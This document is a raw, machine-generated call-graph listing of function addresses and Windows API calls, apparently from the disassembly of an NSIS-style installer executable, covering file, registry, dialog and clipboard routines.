4673 406804 4664->4673 4678 406af5 lstrcpynW 4664->4678 4665->4645 4666->4643 4668 406899 4667->4668 4670 406218 35 API calls 4668->4670 4672 4068a2 4670->4672 4671->4673 4672->4643 4673->4660 4674 405d15 24 API calls 4673->4674 4675 405d15 24 API calls 4673->4675 4676 406218 35 API calls 4673->4676 4679 406560 4673->4679 4674->4660 4675->4673 4676->4673 4677->4646 4678->4664 4680 406b78 2 API calls 4679->4680 4681 40656c 4680->4681 4682 406584 DeleteFileW 4681->4682 4683 40657c RemoveDirectoryW 4681->4683 4684 40658e 4681->4684 4685 40658a 4682->4685 4683->4685 4684->4673 4685->4684 4686 406599 SetFileAttributesW 4685->4686 4686->4684 4992 6fa42ebf 4993 6fa42ed7 4992->4993 4994 6fa41309 2 API calls 4993->4994 4995 6fa42ef2 4994->4995 4687 40225d 4688 402335 4687->4688 4689 40226e 4687->4689 4691 405d15 24 API calls 4688->4691 4690 40303e 17 API calls 4689->4690 4692 402275 4690->4692 4697 40234a 4691->4697 4693 40303e 17 API calls 4692->4693 4694 402281 4693->4694 4695 40228b GetModuleHandleW 4694->4695 4696 40229c LoadLibraryExW 4694->4696 4698 4022b0 4695->4698 4699 402298 4695->4699 4696->4688 4696->4698 4708 406244 4698->4708 4699->4696 4702 4022c4 4705 405d15 24 API calls 4702->4705 4706 4022da 4702->4706 4703 402306 4704 405d15 24 API calls 4703->4704 4704->4706 4705->4706 4706->4697 4707 402329 FreeLibrary 4706->4707 4707->4697 4713 406444 WideCharToMultiByte 4708->4713 4710 406261 4711 406268 GetProcAddress 4710->4711 4712 4022ba 4710->4712 4711->4712 4712->4702 4712->4703 4713->4710 4996 402cde 4997 403002 17 API calls 4996->4997 4998 402b21 4997->4998 4998->4996 4999 402d10 4998->4999 5004 401709 4998->5004 5000 402d35 4999->5000 5001 402d25 4999->5001 5003 405e95 17 API calls 5000->5003 5002 403002 17 API calls 5001->5002 5002->5004 5003->5004 5005 6fa4103a 5006 6fa41052 5005->5006 5007 6fa410c5 5006->5007 5008 6fa41081 5006->5008 5009 6fa41061 5006->5009 5011 6fa4156c GlobalFree 5008->5011 5010 6fa4156c GlobalFree 5009->5010 5012 6fa41072 5010->5012 5016 6fa41079 5011->5016 5014 6fa4156c GlobalFree 5012->5014 5013 6fa41091 GlobalSize 5015 6fa4109a 5013->5015 5014->5016 5017 6fa410af 5015->5017 5018 6fa4109e GlobalAlloc 5015->5018 5016->5013 5016->5015 5020 6fa410b8 GlobalFree 5017->5020 5019 6fa415c5 3 API calls 5018->5019 5019->5017 5020->5007 5021 40285f 5022 402883 5021->5022 5023 402899 5021->5023 5024 403002 17 API calls 5022->5024 5025 4028c3 5023->5025 5026 40289e 5023->5026 5035 402889 5024->5035 5028 40303e 17 API calls 5025->5028 5027 40303e 17 API calls 5026->5027 5029 4028a5 5027->5029 5030 4028ca lstrlenW 5028->5030 5038 406444 WideCharToMultiByte 5029->5038 5030->5035 5031 402910 5033 4028b5 lstrlenA 5033->5035 5034 4028fc 5034->5031 5036 4069e6 WriteFile 5034->5036 5035->5031 5035->5034 5037 40645f 5 API calls 5035->5037 5036->5031 5037->5034 5038->5033 5039 404060 5040 404087 5039->5040 5041 40409d 5039->5041 5100 406a15 GetDlgItemTextW 5040->5100 5042 4040a7 GetDlgItem 5041->5042 5051 40411a 5041->5051 5045 4040bf 5042->5045 5044 404092 5047 406d18 5 API calls 5044->5047 5049 4040d3 SetWindowTextW 5045->5049 5052 406ba0 4 API calls 5045->5052 5046 404139 5048 404098 5046->5048 5102 406a15 GetDlgItemTextW 5046->5102 5047->5048 5056 405736 8 API calls 5048->5056 5053 4054f5 18 API calls 5049->5053 5051->5046 5055 405e95 17 API calls 5051->5055 5057 4040c9 5052->5057 5058 4040f0 5053->5058 5054 404230 5059 406613 18 API calls 5054->5059 5060 404195 SHBrowseForFolderW 5055->5060 5062 4043f1 5056->5062 5057->5049 5068 406531 3 API calls 5057->5068 5063 4054f5 18 API calls 5058->5063 5064 404236 5059->5064 5060->5046 5061 4041b0 CoTaskMemFree 5060->5061 5067 406531 3 API calls 5061->5067 5065 4040fb 5063->5065 5103 406af5 lstrcpynW 5064->5103 5101 4054de SendMessageW 5065->5101 5071 4041bd 5067->5071 5068->5049 5070 404250 5073 4068c1 5 API calls 5070->5073 5074 4041fa SetDlgItemTextW 5071->5074 5077 405e95 17 API calls 5071->5077 5072 404101 5075 4068c1 5 API calls 5072->5075 5076 404256 5073->5076 5074->5046 5075->5048 5086 406ceb 2 API calls 5076->5086 5087 4042ab 5076->5087 5088 404305 5076->5088 5078 4041db lstrcmpiW 5077->5078 5078->5074 5081 4041ef lstrcatW 5078->5081 5080 4042b7 5082 406ba0 4 API calls 5080->5082 5081->5074 5083 4042bd GetDiskFreeSpaceW 5082->5083 5085 4042e5 MulDiv 5083->5085 5083->5088 5085->5088 5086->5076 5104 406af5 lstrcpynW 5087->5104 5089 40437c 5088->5089 5105 40553b 5088->5105 5091 4043a4 EnableWindow 5089->5091 5093 401533 94 API calls 5089->5093 5091->5048 5094 4043cd 5091->5094 5092 404364 5095 404368 5092->5095 5096 40437e SetDlgItemTextW 5092->5096 5097 4043a2 5093->5097 5094->5048 5113 405517 SendMessageW 5094->5113 5099 40553b 20 API calls 5095->5099 5096->5089 5097->5091 5099->5089 5100->5044 5101->5072 5102->5054 5103->5070 5104->5080 5106 405550 5105->5106 5107 405e95 17 API calls 5106->5107 5108 4055d9 5107->5108 5109 405e95 17 API calls 5108->5109 5110 4055e5 5109->5110 5111 405e95 17 API calls 5110->5111 5112 4055f1 lstrlenW wsprintfW SetDlgItemTextW 5111->5112 5112->5092 5113->5048 5114 401ce0 5115 40303e 17 API calls 5114->5115 5116 401ce7 5115->5116 5117 403002 17 API calls 5116->5117 5118 401cf0 wsprintfW 5117->5118 5119 402ea1 5118->5119 5120 6fa41000 5123 6fa4101b 5120->5123 5124 6fa4156c GlobalFree 5123->5124 5125 6fa41020 5124->5125 5126 6fa41024 GlobalAlloc 5125->5126 5127 6fa41032 5125->5127 5126->5127 5128 6fa415c5 3 API calls 5127->5128 5129 6fa41019 5128->5129 5130 403d65 5131 403d7a 5130->5131 5132 403e9f 5130->5132 5136 4054f5 18 API calls 5131->5136 5133 403f20 5132->5133 5134 403ead 5132->5134 5135 403f2b GetDlgItem 5133->5135 5149 403f1b 5133->5149 5141 403eda GetDlgItem SendMessageW EnableWindow 5134->5141 5134->5149 5138 403f4d 5135->5138 5139 403fee 5135->5139 5140 403de9 5136->5140 5137 405736 8 API calls 5152 404033 5137->5152 5145 403f7d SendMessageW LoadCursorW SetCursor 5138->5145 5138->5149 5143 403fff 5139->5143 5139->5149 5142 4054f5 18 API calls 5140->5142 5159 405517 SendMessageW 5141->5159 5146 403df8 CheckDlgButton EnableWindow GetDlgItem 5142->5146 5147 404007 SendMessageW 5143->5147 5148 40401e 5143->5148 5160 4069ce ShellExecuteExW 5145->5160 5158 4054de SendMessageW 5146->5158 5147->5148 5148->5152 5153 404023 SendMessageW 5148->5153 5149->5137 5153->5152 5154 403fe0 LoadCursorW SetCursor 5154->5139 5155 403e2b SendMessageW 5156 403e50 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5155->5156 5157 403e47 GetSysColor 5155->5157 5156->5152 5157->5156 5158->5155 5159->5149 5160->5154 5161 402566 5162 40256e 5161->5162 5167 402574 5161->5167 5163 40303e 17 API calls 5162->5163 5163->5167 5164 40303e 17 API calls 5166 402585 5164->5166 5165 402594 5169 40303e 17 API calls 5165->5169 5166->5165 5168 40303e 17 API calls 5166->5168 5167->5164 5167->5166 5168->5165 5170 40259d WritePrivateProfileStringW 5169->5170 5171 405667 lstrlenW WideCharToMultiByte 5172 402d69 5173 403002 17 API calls 5172->5173 5174 402d6f 5173->5174 5175 405e95 17 API calls 5174->5175 5176 401709 5174->5176 5175->5176 5177 401eea 5178 401ef4 5177->5178 5179 401efe GetDlgItem 5177->5179 5180 403002 17 API calls 5178->5180 5181 401efb 5179->5181 5180->5181 5182 401f3c GetClientRect LoadImageW SendMessageW 5181->5182 5183 40303e 17 API calls 5181->5183 5185 401fa7 5182->5185 5186 401f9c 5182->5186 5183->5182 5186->5185 5187 401fa0 DeleteObject 5186->5187 5187->5185 5188 401aec 5189 401aa2 5188->5189 5192 401ab1 5188->5192 5190 40303e 17 API calls 5189->5190 5191 401aa7 5190->5191 5193 4066f4 66 API calls 5191->5193 5193->5192 5194 40216c 5195 40303e 17 API calls 5194->5195 5196 402173 5195->5196 5197 4065aa 2 API calls 5196->5197 5198 402179 5197->5198 5199 402188 5198->5199 5201 4065fa wsprintfW 5198->5201 5201->5199 4238 404f6d 4239 404f8c 4238->4239 4240 40510e 4238->4240 4239->4240 4243 404f98 4239->4243 4241 405122 GetDlgItem GetDlgItem 4240->4241 4242 40515b 4240->4242 4244 4054f5 18 API calls 4241->4244 4245 4051b2 4242->4245 4256 401399 94 API calls 4242->4256 4246 404fb7 4243->4246 4247 404f9d SetWindowPos 4243->4247 4248 405145 SetClassLongW 4244->4248 4250 4054c3 SendMessageW 4245->4250 4257 405109 4245->4257 4251 40500a 4246->4251 4252 404fbc ShowWindow 4246->4252 4249 4050fa 4247->4249 4255 401533 94 API calls 4248->4255 4262 405736 8 API calls 4249->4262 4279 4051c4 4250->4279 4253 405012 DestroyWindow 4251->4253 4254 40502c 4251->4254 4252->4249 4258 404fe1 GetWindowLongW 4252->4258 4265 405443 4253->4265 4259 405031 SetWindowLongW 4254->4259 4260 405044 4254->4260 4255->4242 4261 40518b 4256->4261 4258->4249 4263 404ffd ShowWindow 4258->4263 4259->4257 4260->4249 4267 405050 GetDlgItem 4260->4267 4261->4245 4268 40518f SendMessageW 4261->4268 4262->4257 4263->4249 4264 401533 94 API calls 4264->4279 4265->4257 4269 405476 ShowWindow 4265->4269 4266 405445 DestroyWindow EndDialog 4266->4265 4270 40506c SendMessageW IsWindowEnabled 4267->4270 4271 40508f 4267->4271 4268->4257 4269->4257 4270->4257 4273 40508b 4270->4273 4274 40509e 4271->4274 4277 4050e1 SendMessageW 4271->4277 4278 4050b0 4271->4278 4285 405096 4271->4285 4272 405e95 17 API calls 4272->4279 4273->4271 4274->4277 4274->4285 4275 4054f5 18 API calls 4275->4279 4276 405933 SendMessageW 4280 4050df 4276->4280 4277->4249 4281 4050c7 4278->4281 4282 4050b9 4278->4282 4279->4257 4279->4264 4279->4266 4279->4272 4279->4275 4287 4054f5 18 API calls 4279->4287 4300 405385 DestroyWindow 4279->4300 4280->4249 4284 401533 94 API calls 4281->4284 4314 401533 4282->4314 4286 4050ce 4284->4286 4285->4276 4286->4249 4286->4285 4288 405248 GetDlgItem 4287->4288 4289 40526f ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4288->4289 4293 405263 4288->4293 4289->4293 4290 4052c4 GetSystemMenu EnableMenuItem SendMessageW 4291 4052f1 SendMessageW 4290->4291 4290->4293 4291->4293 4293->4289 4293->4290 4309 4054de SendMessageW 4293->4309 4310 405cf6 4293->4310 4313 406af5 lstrcpynW 4293->4313 4296 405323 lstrlenW 4297 405e95 17 API calls 4296->4297 4298 40533d SetWindowTextW 4297->4298 4299 401399 94 API calls 4298->4299 4299->4279 4300->4265 4301 40539f CreateDialogParamW 4300->4301 4301->4265 4302 4053d2 4301->4302 4303 4054f5 18 API calls 4302->4303 4304 4053dd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4303->4304 4305 401399 94 API calls 4304->4305 4306 405423 4305->4306 4306->4257 4307 40542b ShowWindow 4306->4307 4308 4054c3 SendMessageW 4307->4308 4308->4265 4309->4293 4311 405e95 17 API calls 4310->4311 4312 405d04 SetWindowTextW 4311->4312 4312->4293 4313->4296 4315 401399 94 API calls 4314->4315 4316 401547 4315->4316 4316->4285 5202 6fa41b0a 5203 6fa41b38 5202->5203 5204 6fa42351 21 API calls 5203->5204 5205 6fa41b3f 5204->5205 5206 6fa41b46 5205->5206 5207 6fa41b52 5205->5207 5208 6fa415eb 2 API calls 5206->5208 5209 6fa41b73 5207->5209 5210 6fa41b5c 5207->5210 5213 6fa41b50 5208->5213 5211 6fa41b9f 5209->5211 5212 6fa41b79 5209->5212 5214 6fa415c5 3 API calls 5210->5214 5216 6fa415c5 3 API calls 5211->5216 5215 6fa41668 3 API calls 5212->5215 5217 6fa41b61 5214->5217 5219 6fa41b7e 5215->5219 5216->5213 5218 6fa41668 3 API calls 5217->5218 5220 6fa41b67 5218->5220 5221 6fa415eb 2 API calls 5219->5221 5222 6fa415eb 2 API calls 5220->5222 5223 6fa41b84 GlobalFree 5221->5223 5224 6fa41b6d GlobalFree 5222->5224 5223->5213 5223->5224 5226 401af0 5227 40303e 17 API calls 5226->5227 5228 401af7 lstrlenW 5227->5228 5229 401afd 5228->5229 5230 40303e 17 API calls 5229->5230 5232 402855 5229->5232 5233 4068f6 GetFileAttributesW CreateFileW 5229->5233 5230->5229 5233->5229 4346 402af5 4347 402afc 4346->4347 4348 401709 4346->4348 4349 403002 17 API calls 4347->4349 4350 402b03 4349->4350 4351 402b10 SetFilePointer 4350->4351 4351->4348 4353 402b21 4351->4353 4352 403002 17 API calls 4352->4353 4353->4348 4353->4352 4354 402d10 4353->4354 4355 402d35 4354->4355 4356 402d25 4354->4356 4358 405e95 17 API calls 4355->4358 4357 403002 17 API calls 4356->4357 4357->4348 4358->4348 5234 402b75 5235 40303e 17 API calls 5234->5235 5236 402b7c FindFirstFileW 5235->5236 5237 402b90 5236->5237 5240 4065fa wsprintfW 5237->5240 5239 402b67 5240->5239 5241 402077 5242 40303e 17 API calls 5241->5242 5243 40207d 5242->5243 5244 40303e 17 API calls 5243->5244 5245 402086 5244->5245 5246 40303e 17 API calls 5245->5246 5247 40208f 5246->5247 5248 40303e 17 API calls 5247->5248 5249 402098 5248->5249 5250 405d15 24 API calls 5249->5250 5251 4020a4 5250->5251 5258 4069ce ShellExecuteExW 5251->5258 5253 4020ea 5255 401709 5253->5255 5259 4064ef WaitForSingleObject 5253->5259 5256 402109 CloseHandle 5256->5255 5258->5253 5260 406506 5259->5260 5261 40651c GetExitCodeProcess 5260->5261 5262 4061ea 2 API calls 5260->5262 5261->5256 5263 40650d WaitForSingleObject 5262->5263 5263->5260 5264 4043f9 GetDlgItem GetDlgItem 5265 40444d 7 API calls 5264->5265 5272 404673 5264->5272 5266 4044f0 DeleteObject 5265->5266 5267 4044e3 SendMessageW 5265->5267 5269 4044ff 5266->5269 5267->5266 5268 4047aa 5270 404884 5268->5270 5271 4047ef 5268->5271 5273 40453d 5269->5273 5277 405e95 17 API calls 5269->5277 5275 404893 SendMessageW 5270->5275 5276 4048af 5270->5276 5274 4048d9 5271->5274 5281 40480e SendMessageW 5271->5281 5272->5268 5296 404705 5272->5296 5318 4056b5 SendMessageW 5272->5318 5280 4054f5 18 API calls 5273->5280 5283 405736 8 API calls 5274->5283 5275->5274 5284 4048b9 5276->5284 5294 4048ef 5276->5294 5279 404515 SendMessageW SendMessageW 5277->5279 5279->5269 5285 404555 5280->5285 5281->5274 5287 40482b SendMessageW 5281->5287 5282 404792 SendMessageW 5282->5268 5288 404b01 5283->5288 5289 4048c2 ImageList_Destroy 5284->5289 5290 4048c9 5284->5290 5292 4054f5 18 API calls 5285->5292 5286 404ab8 5286->5274 5295 404acf ShowWindow GetDlgItem ShowWindow 5286->5295 5293 404844 5287->5293 5289->5290 5290->5274 5291 4048d2 GlobalFree 5290->5291 5291->5274 5304 404561 5292->5304 5299 40485a SendMessageW 5293->5299 5294->5286 5312 404926 5294->5312 5323 405491 5294->5323 5295->5274 5296->5268 5296->5282 5297 404640 GetWindowLongW SetWindowLongW 5298 404656 5297->5298 5300 40466d 5298->5300 5301 40465d ShowWindow 5298->5301 5299->5294 5317 4054de SendMessageW 5300->5317 5301->5300 5303 4045b9 SendMessageW 5303->5304 5304->5297 5304->5303 5305 40463c 5304->5305 5307 4045f5 SendMessageW 5304->5307 5308 404608 SendMessageW 5304->5308 5305->5297 5305->5298 5307->5304 5308->5304 5309 404a6e 5310 404a8a InvalidateRect 5309->5310 5314 404a99 5309->5314 5310->5314 5311 404964 SendMessageW 5313 40497e 5311->5313 5312->5311 5312->5313 5313->5309 5316 404a14 SendMessageW SendMessageW 5313->5316 5314->5286 5315 40553b 20 API calls 5314->5315 5315->5286 5316->5313 5317->5272 5319 405714 SendMessageW 5318->5319 5320 4056d6 GetMessagePos ScreenToClient SendMessageW 5318->5320 5322 40570c 5319->5322 5321 405711 5320->5321 5320->5322 5321->5319 5322->5296 5332 406af5 lstrcpynW 5323->5332 5325 4054a4 5333 4065fa wsprintfW 5325->5333 5327 4054ae 5328 401533 94 API calls 5327->5328 5329 4054b7 5328->5329 5334 406af5 lstrcpynW 5329->5334 5331 4054be 5331->5312 5332->5325 5333->5327 5334->5331 5335 402e7c SendMessageW 5336 402ea1 5335->5336 5337 402e94 InvalidateRect 5335->5337 5337->5336 4898 4025ff 4899 402608 4898->4899 4900 40262f 4898->4900 4901 4030c1 17 API calls 4899->4901 4902 40303e 17 API calls 4900->4902 4903 40260f 4901->4903 4904 402636 4902->4904 4905 402615 4903->4905 4908 402648 4903->4908 4910 40307c 4904->4910 4907 40303e 17 API calls 4905->4907 4909 40261c RegDeleteValueW RegCloseKey 4907->4909 4909->4908 4911 403089 4910->4911 4912 403090 4910->4912 4911->4908 4912->4911 4914 40141e 4912->4914 4915 4062b3 RegOpenKeyExW 4914->4915 4916 40145b 4915->4916 4917 401463 4916->4917 4918 401527 4916->4918 4919 40146f RegEnumValueW 4917->4919 4924 401493 4917->4924 4918->4911 4920 401503 RegCloseKey 4919->4920 4919->4924 4920->4918 4921 4014ce RegEnumKeyW 4922 4014d8 RegCloseKey 4921->4922 4921->4924 4923 4068c1 5 API calls 4922->4923 4925 4014e9 4923->4925 4924->4920 4924->4921 4924->4922 4926 40141e 6 API calls 4924->4926 4927 401514 4925->4927 4928 4014ed RegDeleteKeyW 4925->4928 4926->4924 4927->4918 4928->4918 5338 401000 5339 401039 BeginPaint GetClientRect 5338->5339 5340 40100a DefWindowProcW 5338->5340 5341 40110f 5339->5341 5343 40119a 5340->5343 5344 401117 5341->5344 5345 40107e CreateBrushIndirect FillRect DeleteObject 5341->5345 5346 401185 EndPaint 5344->5346 5347 40111d CreateFontIndirectW 5344->5347 5345->5341 5346->5343 5347->5346 5348 401130 6 API calls 5347->5348 5348->5346 3813 401d01 3816 401d0f 3813->3816 3823 401d5d 3813->3823 3814 401d50 3818 405e95 17 API calls 3814->3818 3815 401d8c GlobalAlloc 3830 405e95 3815->3830 3816->3814 3821 401d1e 3816->3821 3818->3823 3819 401d67 3822 401709 3819->3822 3850 406af5 lstrcpynW 3819->3850 3847 406af5 lstrcpynW 3821->3847 3823->3815 3823->3819 3824 401d79 GlobalFree 3824->3822 3826 401d2d 3848 406af5 lstrcpynW 3826->3848 3828 401d3c 3849 406af5 lstrcpynW 3828->3849 3843 405ea0 3830->3843 3831 4060d9 3832 4060ee 3831->3832 3858 406af5 lstrcpynW 3831->3858 3832->3822 3835 4060a4 lstrlenW 3835->3843 3836 405fb9 GetSystemDirectoryW 3836->3843 3838 405e95 10 API calls 3838->3835 3839 405fcc GetWindowsDirectoryW 3839->3843 3841 405ff9 SHGetSpecialFolderLocation 3842 406011 SHGetPathFromIDListW CoTaskMemFree 3841->3842 3841->3843 3842->3843 3843->3831 3843->3835 3843->3836 3843->3838 3843->3839 3843->3841 3844 405e95 10 API calls 3843->3844 3845 406d18 CharNextW CharNextW CharNextW CharNextW CharPrevW 3843->3845 3846 406045 lstrcatW 3843->3846 3851 406952 3843->3851 3856 4065fa wsprintfW 3843->3856 3857 406af5 lstrcpynW 3843->3857 3844->3843 3845->3843 3846->3843 3847->3826 3848->3828 3849->3822 3850->3824 3859 4062b3 3851->3859 3854 406987 RegQueryValueExW RegCloseKey 3855 4069b8 3854->3855 3855->3843 3856->3843 3857->3843 3858->3832 3860 4062c2 3859->3860 3861 4062c6 3860->3861 3862 4062cb RegOpenKeyExW 3860->3862 3861->3854 3861->3855 3862->3861 5349 401b03 5350 403002 17 API calls 5349->5350 5351 401b0a 5350->5351 5352 403002 17 API calls 5351->5352 5353 401b15 5352->5353 5354 40303e 17 API calls 5353->5354 5355 401b20 lstrlenW 5354->5355 5356 401b3c 5355->5356 5357 401b67 5355->5357 5356->5357 5361 406af5 lstrcpynW 5356->5361 5359 401b5b 5359->5357 5360 401b5f lstrlenW 5359->5360 5360->5357 5361->5359 5362 401c04 5363 403002 17 API calls 5362->5363 5364 401c0e 5363->5364 5365 403002 17 API calls 5364->5365 5366 401bb2 5365->5366 5367 401b88 5368 40303e 17 API calls 5367->5368 5369 401b8f 5368->5369 5370 40303e 17 API calls 5369->5370 5371 401b98 5370->5371 5372 401ba0 lstrcmpiW 5371->5372 5373 401ba8 lstrcmpW 5371->5373 5374 401bae 5372->5374 5373->5374 3909 404b0b 3910 404cb4 3909->3910 3911 404b28 GetDlgItem GetDlgItem GetDlgItem 3909->3911 3913 404d00 3910->3913 3914 404cbc GetDlgItem CreateThread CloseHandle 3910->3914 3955 4054de SendMessageW 3911->3955 3915 404d31 3913->3915 3916 404d08 3913->3916 3918 404ce8 3914->3918 3989 40583f OleInitialize 3914->3989 3920 404d39 3915->3920 3921 404d7f 3915->3921 3916->3918 3919 404d14 ShowWindow ShowWindow 3916->3919 3917 404ba1 3925 404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3917->3925 3960 405736 3918->3960 3974 4054de SendMessageW 3919->3974 3924 404d55 ShowWindow 3920->3924 3928 404d42 3920->3928 3921->3918 3926 404d92 SendMessageW 3921->3926 3924->3928 3929 404d6c 3924->3929 3930 404bf8 SendMessageW SendMessageW 3925->3930 3931 404c0c 3925->3931 3932 404cf6 3926->3932 3933 404db0 CreatePopupMenu 3926->3933 3927 404d2f 3927->3918 3975 405933 3928->3975 3978 405d15 3929->3978 3930->3931 3936 404c14 SendMessageW 3931->3936 3937 404c1e 3931->3937 3939 405e95 17 API calls 3933->3939 3936->3937 3956 4054f5 3937->3956 3941 404dc2 AppendMenuW 3939->3941 3940 404c30 3942 404c39 ShowWindow 3940->3942 3943 404c6b GetDlgItem SendMessageW 3940->3943 3944 404de4 GetWindowRect 3941->3944 3945 404df8 TrackPopupMenu 3941->3945 3946 404c5a 3942->3946 3947 404c4f ShowWindow 3942->3947 3943->3932 3949 404c97 SendMessageW SendMessageW 3943->3949 3944->3945 3945->3932 3948 404e1a 3945->3948 3959 4054de SendMessageW 3946->3959 3947->3946 3950 404e2e SendMessageW 3948->3950 3949->3932 3950->3950 3952 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3950->3952 3953 404e76 SendMessageW 3952->3953 3953->3953 3954 404ea4 GlobalUnlock SetClipboardData CloseClipboard 3953->3954 3954->3932 3955->3917 3957 405e95 17 API calls 3956->3957 3958 405500 SetDlgItemTextW 3957->3958 3958->3940 3959->3943 3961 40574e GetWindowLongW 3960->3961 3962 405804 3960->3962 3961->3962 3963 405763 3961->3963 3962->3932 3963->3962 3964 405797 3963->3964 3965 40578b GetSysColor 3963->3965 3966 4057a5 SetBkMode 3964->3966 3967 40579b SetTextColor 3964->3967 3965->3964 3968 4057cd 3966->3968 3969 4057be GetSysColor 3966->3969 3967->3966 3970 4057d1 SetBkColor 3968->3970 3971 4057de 3968->3971 3969->3968 3970->3971 3971->3962 3972 4057f7 CreateBrushIndirect 3971->3972 3973 4057ee DeleteObject 3971->3973 3972->3962 3973->3972 3974->3927 3976 405940 SendMessageW 3975->3976 3977 40593a 3975->3977 3976->3927 3977->3976 3979 405d27 3978->3979 3984 405ddd 3978->3984 3980 405d46 lstrlenW 3979->3980 3981 405e95 17 API calls 3979->3981 3982 405d58 lstrlenW 3980->3982 3985 405d7b 3980->3985 3981->3980 3983 405d6d lstrcatW 3982->3983 3982->3984 3983->3985 3984->3928 3986 405d92 3985->3986 3987 405d85 SetWindowTextW 3985->3987 3986->3984 3988 405d97 SendMessageW SendMessageW SendMessageW 3986->3988 3987->3986 3988->3984 3996 4054c3 3989->3996 3991 405862 3995 405889 3991->3995 3999 401399 3991->3999 3992 4054c3 SendMessageW 3993 40589b OleUninitialize 3992->3993 3995->3992 3997 4054db 3996->3997 3998 4054cc SendMessageW 3996->3998 3997->3991 3998->3997 4000 4013a3 3999->4000 4002 401413 3999->4002 4000->4002 4003 4013df MulDiv SendMessageW 4000->4003 4004 40154a 4000->4004 4002->3991 4003->4000 4005 4015c3 4004->4005 4113 4015ce 4004->4113 4006 4016c1 4005->4006 4007 4017c2 4005->4007 4008 4015e6 4005->4008 4009 4018cb 4005->4009 4010 40160c 4005->4010 4011 4016ef 4005->4011 4012 4016af 4005->4012 4013 40182f 4005->4013 4014 401711 4005->4014 4015 401633 SetForegroundWindow 4005->4015 4016 4017d3 4005->4016 4017 401618 4005->4017 4018 4015f9 4005->4018 4019 40189b 4005->4019 4020 4018de 4005->4020 4021 40163f 4005->4021 4005->4113 4114 4015d5 4005->4114 4032 4016d1 ShowWindow 4006->4032 4033 4016d9 4006->4033 4023 40303e 17 API calls 4007->4023 4022 4015f0 PostQuitMessage 4008->4022 4008->4113 4027 40303e 17 API calls 4009->4027 4041 405d15 24 API calls 4010->4041 4034 40303e 17 API calls 4011->4034 4156 4065fa wsprintfW 4012->4156 4030 40303e 17 API calls 4013->4030 4024 40303e 17 API calls 4014->4024 4015->4113 4026 40303e 17 API calls 4016->4026 4028 403002 17 API calls 4017->4028 4049 401399 77 API calls 4018->4049 4025 40303e 17 API calls 4019->4025 4029 40303e 17 API calls 4020->4029 4052 403002 17 API calls 4021->4052 4021->4113 4022->4113 4036 4017c8 4023->4036 4037 401718 4024->4037 4038 4018a2 SearchPathW 4025->4038 4039 4017da 4026->4039 4040 4018d2 4027->4040 4042 40161e Sleep 4028->4042 4043 4018e5 4029->4043 4044 401835 GetFullPathNameW 4030->4044 4032->4033 4045 4016e6 ShowWindow 4033->4045 4033->4113 4035 4016f6 SetFileAttributesW 4034->4035 4035->4113 4160 4065aa FindFirstFileW 4036->4160 4115 406ba0 CharNextW CharNextW 4037->4115 4038->4113 4050 40303e 17 API calls 4039->4050 4130 406a31 4040->4130 4041->4113 4042->4113 4059 401906 4043->4059 4060 40190e 4043->4060 4053 401857 4044->4053 4054 40184d 4044->4054 4045->4113 4046 405d15 24 API calls 4046->4113 4049->4113 4055 4017e3 4050->4055 4052->4113 4053->4054 4066 4065aa 2 API calls 4053->4066 4056 401889 GetShortPathNameW 4054->4056 4054->4113 4058 40303e 17 API calls 4055->4058 4056->4113 4057 401780 4057->4010 4065 401790 4057->4065 4062 4017ec MoveFileW 4058->4062 4168 406af5 lstrcpynW 4059->4168 4169 406af5 lstrcpynW 4060->4169 4061 4065d1 CharNextW 4082 401720 4061->4082 4062->4010 4067 401804 4062->4067 4070 405d15 24 API calls 4065->4070 4071 40186a 4066->4071 4074 4065aa 2 API calls 4067->4074 4067->4113 4068 40190c 4077 406d18 5 API calls 4068->4077 4069 401919 4170 406531 lstrlenW CharPrevW 4069->4170 4073 401797 4070->4073 4071->4054 4167 406af5 lstrcpynW 4071->4167 4129 406af5 lstrcpynW 4073->4129 4081 401814 4074->4081 4108 40192b 4077->4108 4081->4113 4163 406218 MoveFileExW 4081->4163 4082->4057 4082->4061 4085 401769 GetFileAttributesW 4082->4085 4121 4064d7 4082->4121 4124 405e19 CreateDirectoryW 4082->4124 4157 405df9 CreateDirectoryW 4082->4157 4083 4017a2 SetCurrentDirectoryW 4083->4113 4085->4082 4086 401968 4173 406b78 GetFileAttributesW 4086->4173 4088 4065aa 2 API calls 4088->4108 4091 40193f CompareFileTime 4091->4108 4092 401a18 4094 405d15 24 API calls 4092->4094 4093 4019fd 4096 405d15 24 API calls 4093->4096 4097 401a24 4094->4097 4095 406af5 lstrcpynW 4095->4108 4096->4113 4135 403148 4097->4135 4100 401a52 SetFileTime 4101 401a60 CloseHandle 4100->4101 4103 401a73 4101->4103 4101->4113 4102 405e95 17 API calls 4102->4108 4104 401a78 4103->4104 4105 401a89 4103->4105 4106 405e95 17 API calls 4104->4106 4107 405e95 17 API calls 4105->4107 4109 401a80 lstrcatW 4106->4109 4110 401a91 4107->4110 4108->4086 4108->4088 4108->4091 4108->4092 4108->4093 4108->4095 4108->4102 4108->4114 4134 4068f6 GetFileAttributesW CreateFileW 4108->4134 4176 406a83 4108->4176 4109->4110 4112 406a83 MessageBoxIndirectW 4110->4112 4112->4113 4113->4000 4114->4046 4114->4113 4116 406bbe 4115->4116 4120 406bf5 4115->4120 4117 406bcd CharNextW 4116->4117 4119 406bd2 4116->4119 4117->4120 4118 4065d1 CharNextW 4118->4119 4119->4118 4119->4120 4120->4082 4180 4068c1 GetModuleHandleA 4121->4180 4125 405e64 GetLastError 4124->4125 4126 405e87 4124->4126 4125->4126 4127 405e71 SetFileSecurityW 4125->4127 4126->4082 4127->4126 4128 405e8b GetLastError 4127->4128 4128->4126 4129->4083 4131 406a3e GetTickCount GetTempFileNameW 4130->4131 4132 406a72 4131->4132 4133 406a76 4131->4133 4132->4131 4132->4133 4133->4113 4134->4108 4136 403190 4135->4136 4137 403183 4135->4137 4189 406923 ReadFile 4136->4189 4204 403131 SetFilePointer 4137->4204 4141 401a3a 4141->4100 4141->4101 4142 4032f6 4144 40333d 4142->4144 4149 4032fa 4142->4149 4143 4031b6 GetTickCount 4148 4031ca 4143->4148 4145 40311b ReadFile 4144->4145 4145->4141 4146 40311b ReadFile 4146->4149 4148->4141 4152 40323a GetTickCount 4148->4152 4153 40326b MulDiv wsprintfW 4148->4153 4191 40311b 4148->4191 4194 406e83 4148->4194 4202 4069e6 WriteFile 4148->4202 